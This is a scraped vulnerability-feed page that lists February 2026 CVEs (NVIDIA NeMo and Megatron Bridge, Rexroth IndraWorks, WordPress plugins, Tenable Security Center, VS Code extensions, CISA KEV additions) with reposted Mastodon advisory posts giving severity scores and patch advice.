NVIDIA Megatron Bridge contains a vulnerability in a data shuffling tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.

thehackerwire@mastodon.social at 2026-02-18T16:01:30.000Z ##

🟠 CVE-2025-33240 - High (7.8)

NVIDIA Megatron Bridge contains a vulnerability in a data shuffling tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T16:01:30.000Z ##

🟠 CVE-2025-33240 - High (7.8)

NVIDIA Megatron Bridge contains a vulnerability in a data shuffling tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-33251
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T17:51:53.510000

2 posts

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.

thehackerwire@mastodon.social at 2026-02-18T15:18:02.000Z ##

🟠 CVE-2025-33251 - High (7.8)

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T15:18:02.000Z ##

🟠 CVE-2025-33251 - High (7.8)

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-33245
(8.0 HIGH)

EPSS: 0.00%

updated 2026-02-18T17:51:53.510000

2 posts

NVIDIA NeMo Framework contains a vulnerability where malicious data could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.

thehackerwire@mastodon.social at 2026-02-18T15:01:44.000Z ##

🟠 CVE-2025-33245 - High (8)

NVIDIA NeMo Framework contains a vulnerability where malicious data could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T15:01:44.000Z ##

🟠 CVE-2025-33245 - High (8)

NVIDIA NeMo Framework contains a vulnerability where malicious data could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-60035
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T17:51:53.510000

2 posts

A vulnerability has been identified in the OPC.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes t

thehackerwire@mastodon.social at 2026-02-18T14:18:31.000Z ##

🟠 CVE-2025-60035 - High (7.8)

A vulnerability has been identified in the OPC.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipul...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T14:18:31.000Z ##

🟠 CVE-2025-60035 - High (7.8)

A vulnerability has been identified in the OPC.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipul...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-33253
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T17:51:53.510000

2 posts

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by convincing a user to load a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.

thehackerwire@mastodon.social at 2026-02-18T14:18:20.000Z ##

🟠 CVE-2025-33253 - High (7.8)

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by convincing a user to load a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, denial of service,...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T14:18:20.000Z ##

🟠 CVE-2025-33253 - High (7.8)

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by convincing a user to load a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, denial of service,...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1937
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-02-18T17:51:53.510000

4 posts

The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the `yaymail_import_state` AJAX action in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to update arbitrary options on t

offseq at 2026-02-18T07:30:30.056Z ##

🚩 CVE-2026-1937 (CRITICAL): YayMail – WooCommerce Email Customizer (all versions) lets Shop Managers escalate privileges via missing AJAX authorization. Admin access at risk! Patch and audit roles ASAP. radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-18T07:20:48.000Z ##

🔴 CVE-2026-1937 - Critical (9.8)

The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the `yaymail_import_state` AJAX action in all versions ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-18T07:30:30.000Z ##

🚩 CVE-2026-1937 (CRITICAL): YayMail – WooCommerce Email Customizer (all versions) lets Shop Managers escalate privileges via missing AJAX authorization. Admin access at risk! Patch and audit roles ASAP. radar.offseq.com/threat/cve-20 #OffSeq #WordPress #CVE20261937 #WooCommerce

##

thehackerwire@mastodon.social at 2026-02-18T07:20:48.000Z ##

🔴 CVE-2026-1937 - Critical (9.8)

The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the `yaymail_import_state` AJAX action in all versions ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22048
(7.1 HIGH)

EPSS: 0.04%

updated 2026-02-18T17:51:53.510000

2 posts

StorageGRID (formerly StorageGRID Webscale) versions prior to 11.9.0.12 and 12.0.0.4 with Single Sign-on enabled and configured to use Microsoft Entra ID (formerly Azure AD) as an IdP are susceptible to a Server-Side Request Forgery (SSRF) vulnerability. Successful exploit could allow an authenticated attacker with low privileges to delete configuration data or deny access to some resources.

offseq at 2026-02-18T03:00:30.837Z ##

⚠️ CVE-2026-22048: HIGH-severity SSRF in NETAPP StorageGRID (pre-11.9.0.12, 12.0.0.4) with SSO + Entra ID. Authenticated attackers can delete configs/deny access. Patch or disable SSO now. radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-02-18T03:00:30.000Z ##

⚠️ CVE-2026-22048: HIGH-severity SSRF in NETAPP StorageGRID (pre-11.9.0.12, 12.0.0.4) with SSO + Entra ID. Authenticated attackers can delete configs/deny access. Patch or disable SSO now. radar.offseq.com/threat/cve-20 #OffSeq #NETAPP #SSRF #Vulnerability

##

CVE-2026-23599
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-18T17:51:53.510000

4 posts

A local privilege-escalation vulnerability has been discovered in the HPE Aruba Networking ClearPass OnGuard Software for Linux. Successful exploitation of this vulnerability could allow a local attacker to achieve arbitrary code execution with root privileges.

offseq at 2026-02-18T01:30:30.132Z ##

🚨 CVE-2026-23599: HIGH severity local privilege escalation in HPE Aruba ClearPass Policy Manager (6.11.0 & 6.12.0, Linux). No patch yet — limit local access, enforce MFA, and monitor systems. radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-18T00:16:41.000Z ##

🟠 CVE-2026-23599 - High (7.8)

A local privilege-escalation vulnerability has been discovered in the HPE Aruba Networking ClearPass OnGuard Software for Linux. Successful exploitation of this vulnerability could allow a local attacker to achieve arbitrary code execution with ro...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-18T01:30:30.000Z ##

🚨 CVE-2026-23599: HIGH severity local privilege escalation in HPE Aruba ClearPass Policy Manager (6.11.0 & 6.12.0, Linux). No patch yet — limit local access, enforce MFA, and monitor systems. radar.offseq.com/threat/cve-20 #OffSeq #Infosec #Vulnerability #ArubaNetworks

##

thehackerwire@mastodon.social at 2026-02-18T00:16:41.000Z ##

🟠 CVE-2026-23599 - High (7.8)

A local privilege-escalation vulnerability has been discovered in the HPE Aruba Networking ClearPass OnGuard Software for Linux. Successful exploitation of this vulnerability could allow a local attacker to achieve arbitrary code execution with ro...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-13691
(8.1 HIGH)

EPSS: 0.03%

updated 2026-02-18T17:51:53.510000

2 posts

IBM DataStage on Cloud Pak for Data 5.1.2 through 5.3.0 returns sensitive information in an HTTP response that could be used to impersonate other users in the system.

thehackerwire@mastodon.social at 2026-02-17T22:00:16.000Z ##

🟠 CVE-2025-13691 - High (8.1)

IBM DataStage on Cloud Pak for Data 5.1.2 through 5.3.0 returns sensitive information in an HTTP response that could be used to impersonate other users in the system.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T22:00:16.000Z ##

🟠 CVE-2025-13691 - High (8.1)

IBM DataStage on Cloud Pak for Data 5.1.2 through 5.3.0 returns sensitive information in an HTTP response that could be used to impersonate other users in the system.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23595
(8.8 HIGH)

EPSS: 0.09%

updated 2026-02-18T17:51:53.510000

2 posts

An authentication bypass in the application API allows an unauthorized administrative account to be created. A remote attacker could exploit this vulnerability to create privileged user accounts. Successful exploitation could allow an attacker to gain administrative access, modify system configurations, and access or manipulate sensitive data.

thehackerwire@mastodon.social at 2026-02-17T22:00:07.000Z ##

🟠 CVE-2026-23595 - High (8.8)

An authentication bypass in the application API allows an unauthorized administrative account to be created. A remote attacker could exploit this vulnerability to create privileged user accounts. Successful exploitation could allow an attacker to ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T22:00:07.000Z ##

🟠 CVE-2026-23595 - High (8.8)

An authentication bypass in the application API allows an unauthorized administrative account to be created. A remote attacker could exploit this vulnerability to create privileged user accounts. Successful exploitation could allow an attacker to ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2630
(8.8 HIGH)

EPSS: 0.29%

updated 2026-02-18T17:51:53.510000

4 posts

A Command Injection vulnerability exists where an authenticated, remote attacker could execute arbitrary code on the underlying server where Tenable Security Center is hosted.

thehackerwire@mastodon.social at 2026-02-17T19:47:36.000Z ##

🔴 CVE-2026-2630 - Critical (9.9)

A Command Injection vulnerability exists where an authenticated, remote attacker could execute arbitrary code on the underlying server where Tenable Security Center is hosted.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq at 2026-02-17T19:00:13.622Z ##

🚨 CVE-2026-2630: CRITICAL OS Command Injection in Tenable Security Center (CVSS 9.9). Authenticated attackers can run arbitrary code on the server. Restrict access, monitor logs, and patch ASAP. radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-17T19:47:36.000Z ##

🔴 CVE-2026-2630 - Critical (9.9)

A Command Injection vulnerability exists where an authenticated, remote attacker could execute arbitrary code on the underlying server where Tenable Security Center is hosted.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-17T19:00:13.000Z ##

🚨 CVE-2026-2630: CRITICAL OS Command Injection in Tenable Security Center (CVSS 9.9). Authenticated attackers can run arbitrary code on the server. Restrict access, monitor logs, and patch ASAP. radar.offseq.com/threat/cve-20 #OffSeq #Tenable #Vuln

##

CVE-2026-1368
(7.5 HIGH)

EPSS: 0.01%

updated 2026-02-18T15:32:29

2 posts

The Video Conferencing with Zoom WordPress plugin before 4.6.6 contains an AJAX handler that has its nonce verification commented out, allowing unauthenticated attackers to generate valid Zoom SDK signatures for any meeting ID and retrieve the site's Zoom SDK key.

thehackerwire@mastodon.social at 2026-02-18T16:01:49.000Z ##

🟠 CVE-2026-1368 - High (7.5)

The Video Conferencing with Zoom WordPress plugin before 4.6.6 contains an AJAX handler that has its nonce verification commented out, allowing unauthenticated attackers to generate valid Zoom SDK signatures for any meeting ID and retrieve the sit...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T16:01:49.000Z ##

🟠 CVE-2026-1368 - High (7.5)

The Video Conferencing with Zoom WordPress plugin before 4.6.6 contains an AJAX handler that has its nonce verification commented out, allowing unauthenticated attackers to generate valid Zoom SDK signatures for any meeting ID and retrieve the sit...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1426
(8.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T15:31:35

4 posts

The Advanced AJAX Product Filters plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.9.6 via deserialization of untrusted input in the shortcode_check function within the Live Composer compatibility layer. This makes it possible for authenticated attackers, with Author-level access and above, to inject a PHP Object. No known POP chain is present in

offseq at 2026-02-18T18:30:15.067Z ##

🔒 CVE-2026-1426: HIGH severity PHP Object Injection in berocket Advanced AJAX Product Filters (WordPress, <=3.1.9.6). Requires Author access + Live Composer, and a gadget chain in another plugin/theme. Update or audit now! radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-18T15:32:28.000Z ##

🟠 CVE-2026-1426 - High (8.8)

The Advanced AJAX Product Filters plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.9.6 via deserialization of untrusted input in the shortcode_check function within the Live Composer compatibilit...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-18T18:30:15.000Z ##

🔒 CVE-2026-1426: HIGH severity PHP Object Injection in berocket Advanced AJAX Product Filters (WordPress, <=3.1.9.6). Requires Author access + Live Composer, and a gadget chain in another plugin/theme. Update or audit now! radar.offseq.com/threat/cve-20 #OffSeq #WordPress #PHP

##

thehackerwire@mastodon.social at 2026-02-18T15:32:28.000Z ##

🟠 CVE-2026-1426 - High (8.8)

The Advanced AJAX Product Filters plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.9.6 via deserialization of untrusted input in the shortcode_check function within the Live Composer compatibilit...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-33250
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T15:31:34

2 posts

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.

thehackerwire@mastodon.social at 2026-02-18T15:05:16.000Z ##

🟠 CVE-2025-33250 - High (7.8)

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T15:05:16.000Z ##

🟠 CVE-2025-33250 - High (7.8)

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-60037
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T15:31:34

2 posts

A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). Thi

thehackerwire@mastodon.social at 2026-02-18T14:32:12.000Z ##

🟠 CVE-2025-60037 - High (7.8)

A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, spe...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T14:32:12.000Z ##

🟠 CVE-2025-60037 - High (7.8)

A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, spe...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-33239
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T15:31:33

2 posts

NVIDIA Megatron Bridge contains a vulnerability in a data merging tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.

thehackerwire@mastodon.social at 2026-02-18T15:18:23.000Z ##

🟠 CVE-2025-33239 - High (7.8)

NVIDIA Megatron Bridge contains a vulnerability in a data merging tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T15:18:23.000Z ##

🟠 CVE-2025-33239 - High (7.8)

NVIDIA Megatron Bridge contains a vulnerability in a data merging tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-33236
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T15:31:33

2 posts

NVIDIA NeMo Framework contains a vulnerability where malicious data created by an attacker could cause code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.

thehackerwire@mastodon.social at 2026-02-18T15:18:13.000Z ##

🟠 CVE-2025-33236 - High (7.8)

NVIDIA NeMo Framework contains a vulnerability where malicious data created by an attacker could cause code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and d...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T15:18:13.000Z ##

🟠 CVE-2025-33236 - High (7.8)

NVIDIA NeMo Framework contains a vulnerability where malicious data created by an attacker could cause code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and d...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-33249
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T15:31:33

2 posts

NVIDIA NeMo Framework for all platforms contains a vulnerability in a voice-preprocessing script, where malicious input created by an attacker could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.

thehackerwire@mastodon.social at 2026-02-18T15:05:06.000Z ##

🟠 CVE-2025-33249 - High (7.8)

NVIDIA NeMo Framework for all platforms contains a vulnerability in a voice-preprocessing script, where malicious input created by an attacker could cause a code injection. A successful exploit of this vulnerability might lead to code execution, e...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T15:05:06.000Z ##

🟠 CVE-2025-33249 - High (7.8)

NVIDIA NeMo Framework for all platforms contains a vulnerability in a voice-preprocessing script, where malicious input created by an attacker could cause a code injection. A successful exploit of this vulnerability might lead to code execution, e...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-33246
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T15:31:33

2 posts

NVIDIA NeMo Framework for all platforms contains a vulnerability in the ASR Evaluator utility, where a user could cause a command injection by supplying crafted input to a configuration parameter. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, or information disclosure.

thehackerwire@mastodon.social at 2026-02-18T15:04:56.000Z ##

🟠 CVE-2025-33246 - High (7.8)

NVIDIA NeMo Framework for all platforms contains a vulnerability in the ASR Evaluator utility, where a user could cause a command injection by supplying crafted input to a configuration parameter. A successful exploit of this vulnerability might l...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T15:04:56.000Z ##

🟠 CVE-2025-33246 - High (7.8)

NVIDIA NeMo Framework for all platforms contains a vulnerability in the ASR Evaluator utility, where a user could cause a command injection by supplying crafted input to a configuration parameter. A successful exploit of this vulnerability might l...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-33243
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T15:31:33

2 posts

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution in distributed environments. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.

thehackerwire@mastodon.social at 2026-02-18T15:01:35.000Z ##

🟠 CVE-2025-33243 - High (7.8)

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution in distributed environments. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T15:01:35.000Z ##

🟠 CVE-2025-33243 - High (7.8)

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution in distributed environments. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-60038
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T15:31:33

2 posts

A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). Thi

thehackerwire@mastodon.social at 2026-02-18T14:32:22.000Z ##

🟠 CVE-2025-60038 - High (7.8)

A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, spe...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T14:32:22.000Z ##

🟠 CVE-2025-60038 - High (7.8)

A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, spe...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-60036
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T15:31:33

2 posts

A vulnerability has been identified in the UA.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes th

thehackerwire@mastodon.social at 2026-02-18T14:32:03.000Z ##

🟠 CVE-2025-60036 - High (7.8)

A vulnerability has been identified in the UA.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulat...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T14:32:03.000Z ##

🟠 CVE-2025-60036 - High (7.8)

A vulnerability has been identified in the UA.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulat...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-33252
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T15:31:33

2 posts

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.

thehackerwire@mastodon.social at 2026-02-18T14:18:11.000Z ##

🟠 CVE-2025-33252 - High (7.8)

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T14:18:11.000Z ##

🟠 CVE-2025-33252 - High (7.8)

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-65715
(7.8 HIGH)

EPSS: 0.02%

updated 2026-02-18T15:31:25

4 posts

An issue in the code-runner.executorMap setting of Visual Studio Code Extensions Code Runner v0.12.2 allows attackers to execute arbitrary code when opening a crafted workspace.

thehackerwire@mastodon.social at 2026-02-18T16:27:18.000Z ##

🟠 CVE-2025-65715 - High (7.8)

An issue in the code-runner.executorMap setting of Visual Studio Code Extensions Code Runner v0.12.2 allows attackers to execute arbitrary code when opening a crafted workspace.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

jbhall56 at 2026-02-18T13:43:08.593Z ##

The security issues impact Code Runner (CVE-2025-65715), Markdown Preview Enhanced (CVE-2025-65716), Markdown Preview Enhanced (CVE-2025-65717), and Microsoft Live Preview (no identifier assigned). bleepingcomputer.com/news/secu

##

thehackerwire@mastodon.social at 2026-02-18T16:27:18.000Z ##

🟠 CVE-2025-65715 - High (7.8)

An issue in the code-runner.executorMap setting of Visual Studio Code Extensions Code Runner v0.12.2 allows attackers to execute arbitrary code when opening a crafted workspace.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

jbhall56@infosec.exchange at 2026-02-18T13:43:08.000Z ##

The security issues impact Code Runner (CVE-2025-65715), Markdown Preview Enhanced (CVE-2025-65716), Markdown Preview Enhanced (CVE-2025-65717), and Microsoft Live Preview (no identifier assigned). bleepingcomputer.com/news/secu

##

CVE-2024-7694
(7.2 HIGH)

EPSS: 1.86%

updated 2026-02-18T13:46:48.840000

6 posts

ThreatSonar Anti-Ransomware from TeamT5 does not properly validate the content of uploaded files. Remote attackers with administrator privileges on the product platform can upload malicious files, which can be used to execute arbitrary system command on the server.

AAKL at 2026-02-18T15:59:56.551Z ##

CISA added four known vulnerabilities to the KEV catalogue yesterday, if you missed them.

- CVE-2008-0015: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability cve.org/CVERecord?id=CVE-2008-

- CVE-2020-7796: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability cve.org/CVERecord?id=CVE-2020-

- CVE-2024-7694: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability cve.org/CVERecord?id=CVE-2026-

##

secdb at 2026-02-17T22:00:17.716Z ##

🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2008-0015 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
